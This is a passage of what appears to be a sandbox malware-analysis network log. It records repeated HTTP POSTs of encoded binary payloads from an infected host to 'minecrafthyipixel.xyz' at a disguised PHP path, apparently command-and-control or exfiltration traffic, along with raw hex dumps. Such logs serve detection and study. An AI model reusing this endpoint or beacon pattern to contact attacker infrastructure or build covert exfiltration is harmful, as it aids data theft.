                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=teQWyI1y%2FXsJw7rh8I0%2BCR%2BftH8fCY6Df3CbxkTrJI%2BsjeXGgp19ulgOQYZGb66OT%2BG75GRKKiHX4t5Hw1%2BshKDAkAOITcRVgES1EAK5Yv1zJtZR2hLljlWaJDmwuz1Ui%2FPQxlGn09k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca47dea24673d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:25.589570045 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    176192.168.2.449930104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:25.818037987 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:25.925026894 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:25.927653074 CEST2512OUTData Raw: 57 55 5b 5b 59 47 54 58 5c 5e 59 59 57 51 58 5f 54 57 5f 5f 54 59 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[[YGTX\^YYWQX_TW__TYSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%5(&37382=($1:,U$(.#2!*+7?-5$[. X =
                                                                                                                                    Apr 19, 2024 13:44:26.185456991 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:26 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RzoZmGV%2BuBEdMW%2BLO8uWgM5aeT015eSHIS0Z17pT32N%2BSornBBninaLvCR8z8%2FrFVkP1bRK38qIozR%2FIYmoeyhedki8tW4YwNz8IvqhXRssiaHfiGgqmmWk10Pzwq0QfeRjzOx7o8aA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca481bdbd12f5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:26.185483932 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    177192.168.2.449931104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:26.407507896 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:26.511984110 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:26.512141943 CEST2512OUTData Raw: 52 5e 5b 5e 59 46 51 5f 5c 5e 59 59 57 53 58 5f 54 57 5f 5f 54 5f 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[^YFQ_\^YYWSX_TW__T_SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%2W6]<[' 0$+&=82)+&>#2"*;(7?8\-$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:26.857815027 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:26 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2BJVvlY5B1BLH2AtA65GYvd0ROUbyp9ueKLL8NU%2BAvxCYftRzi4iU0gg5YGI9tL%2Bt9eztt5LrHk1I6qNRhhKWcuKmNyN51JJRO%2Be4PrkDCABrZq8C2aWLZnpSj%2FfWSioelGn4%2FIo9%2B8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4856e701353-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:26.857877016 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    178192.168.2.449932104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:27.075130939 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:27.180314064 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:27.180527925 CEST2512OUTData Raw: 57 5d 5e 59 59 4a 54 58 5c 5e 59 59 57 54 58 58 54 52 5f 5e 54 55 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^YYJTX\^YYWTXXTR_^TUSW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%'>"; X$''&*+1?%27T1)+^##.$[. X )
                                                                                                                                    Apr 19, 2024 13:44:27.551052094 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:27 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jv2hh2uSVz2xGBVZK27HXe0wXkEm9Vds513ZkaK2DYiWxzvBAgEGahP%2Fyqr5RtjCktRyA2X0ga3Tv%2FN57xnY8U2L33B1zlQZu8eOP2m3m69r2dDZ%2BzSE25s93ywFJBbBmWnoZI2wbiQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca48989ea7bc0-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:27.551115990 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    179192.168.2.449933104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:27.781963110 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:27.886681080 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:27.887708902 CEST2512OUTData Raw: 57 5e 5e 58 5c 40 54 58 5c 5e 59 59 57 56 58 5f 54 52 5f 5b 54 5e 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^X\@TX\^YYWVX_TR_[T^SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z'=5";$V'['(!P>; '*'2;6!1">8;\#?:%$[. X !
                                                                                                                                    Apr 19, 2024 13:44:28.146203041 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:28 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bda0ipyxL4zmogaliH67%2Fw9ofH1zKbRifzkv4J97ZmQWm%2FsdyvU52yf5P9JIBD6GDxxUNAj5%2B%2BJwuX7eQKHoAzKAjt17o7hj%2BuHjZqN1xCs1XyzivsER1cHbAKXXKEyQCruh02dgLxI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca48dfc4d7cc6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:28.146265984 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    180192.168.2.449934104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:28.373927116 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:28.478468895 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:28.490915060 CEST2512OUTData Raw: 57 58 5e 5d 5c 46 51 59 5c 5e 59 59 57 5f 58 5b 54 57 5f 5e 54 5b 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WX^]\FQY\^YYW_X[TW_^T[SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%>58($03">;7_&T1;)#!5)+7_#?09$[. X
                                                                                                                                    Apr 19, 2024 13:44:28.748598099 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:28 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gVupCwameleSlZLj2ePTI0ohpdI3E4OJuN69vskmNcQX1oarNsuDiHlj3Jy3Wd3F%2Bj6N8p%2BcIdJfOQZozQ4io8vh4ja31DcniXHwlIpVFeFIPYonR1C6QYwFDiIDVEuThn13G3jj00s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca491a9af4542-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:28.748665094 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    181192.168.2.449935104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:29.140885115 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:29.246015072 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:29.246387959 CEST2512OUTData Raw: 57 5d 5b 5f 59 44 51 59 5c 5e 59 59 57 54 58 58 54 57 5f 5a 54 58 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W][_YDQY\^YYWTXXTW_ZTXS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'.6S"[$8'.)8%0%8.#!*$4?-$[. X )


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    182192.168.2.449936104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:30.323599100 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2164
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:30.430380106 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:30.430531979 CEST2164OUTData Raw: 57 54 5e 54 59 45 54 5e 5c 5e 59 59 57 56 58 5b 54 57 5f 58 54 5b 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^TYET^\^YYWVX[TW_XT[SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&2" $ $%+*'Y&0U%) P>('^7'-%$[. X !
                                                                                                                                    Apr 19, 2024 13:44:30.797111034 CEST770INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:30 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1Xh27DUNfD9iPa%2BnXTUqMXwZfqVJz6Zoo6ON4j4cTgA4CizO6xDaB%2BAwArf1Q6ESK%2FuwS%2BUT0wgBs68iVZ2Of2QpLn6VslqeNdA0Lq23L3KKZKhgTJdi9AhamIwrtP2froLL6PJusg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca49ddf996736-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5f 27 26 26 15 22 39 3f 5a 2a 23 32 13 29 09 0f 5a 2a 29 03 17 37 03 16 1e 38 03 2b 03 3f 02 36 5d 25 0d 03 14 33 04 2f 0e 25 1a 21 59 00 1a 39 5d 20 3f 36 01 2e 00 3e 02 2b 31 39 10 37 32 02 07 2b 10 0b 1a 23 01 2f 18 3c 2e 0b 52 2d 38 0a 50 28 16 2a 07 2c 0e 39 05 35 3b 2c 52 09 12 26 0b 28 28 0e 5a 27 33 2a 0d 34 57 34 1e 3f 06 26 12 25 3b 24 57 32 30 28 5e 2e 1c 2e 12 26 07 29 1e 28 2a 0d 0c 22 3c 3d 51 32 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$_'&&"9?Z*#2)Z*)78+?6]%3/%!Y9] ?6.>+1972+#/<.R-8P(*,95;,R&((Z'3*4W4?&%;$W20(^..&)(*"<=Q2.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:44:30.797194958 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    183192.168.2.449937104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:30.495500088 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:30.600650072 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:30.600943089 CEST2512OUTData Raw: 57 5c 5e 5b 5c 41 54 58 5c 5e 59 59 57 54 58 53 54 51 5f 5b 54 5e 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\^[\ATX\^YYWTXSTQ_[T^SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'=>S6/03;0T*'^'*?2!!2T)7#:$[. X )
                                                                                                                                    Apr 19, 2024 13:44:30.868021011 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:30 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s9Fz2mb%2FuPycaraBFOuMavvdJmJgIZGVDdaVAXII83J096vrPGz%2BpTBanhAXHDMS9rJIGsEJgobxlcZpaT%2B3ZANc82TnKVTlRhw%2Bv4vtjQs%2Bsv4x4s%2Bl6zclkDw5y1i%2FMWYz6ecqT70%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca49ee97cb051-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:30.868082047 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    184192.168.2.449938104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:31.103835106 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:31.208529949 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:31.208756924 CEST2512OUTData Raw: 52 5d 5e 58 59 44 51 5f 5c 5e 59 59 57 53 58 52 54 51 5f 5b 54 54 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R]^XYDQ_\^YYWSXRTQ_[TTS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&X"V!8+&3$$!P*(4':$W%;"W#")]<",0]:5$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:31.475678921 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:31 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cPiI1kOdndiE6rZREa4dQyE07Zs%2B3HY7af0ysLXQ4bpqRkeuRaFIrOXRD9m3QsZYqzWXN9cV12SHAw%2Bhigp3S%2FzmPq9m5MyT0EJKfazHwT3J4AJmbyYlbLR9K5exWrlQntlIwuFcxvo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4a2bfb0672d-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:31.475744009 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    185192.168.2.449939104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:31.702852964 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
